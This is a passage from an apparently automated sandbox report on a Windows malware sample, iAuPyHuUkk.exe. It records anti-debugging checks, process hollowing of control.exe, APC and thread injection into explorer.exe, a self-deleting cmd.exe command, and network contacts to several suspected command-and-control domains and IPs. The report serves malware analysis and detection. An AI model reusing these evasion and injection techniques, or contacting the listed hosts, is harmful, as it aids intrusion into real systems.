            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C5138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C65BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B94F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B94F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C5131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00409B50 LdrLoadDll,
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.vintagepaseo.com
            Source: C:\Windows\explorer.exeDomain query: www.brandmty.net
            Source: C:\Windows\explorer.exeDomain query: www.iphone13promax.design
            Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80
            Source: C:\Windows\explorer.exeDomain query: www.umdasch-lagertechnik.com
            Source: C:\Windows\explorer.exeDomain query: www.districonio.com
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.226 80
            Source: C:\Windows\explorer.exeNetwork Connect: 154.216.110.149 80
            Source: C:\Windows\explorer.exeDomain query: www.cyebang.com
            Source: C:\Windows\explorer.exeDomain query: www.xn--aprendes-espaol-brb.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: D20000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread register set: target process: 3440
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread register set: target process: 3440
            Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3440
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: &Program Manager
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Users\user\Desktop\iAuPyHuUkk.exe VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
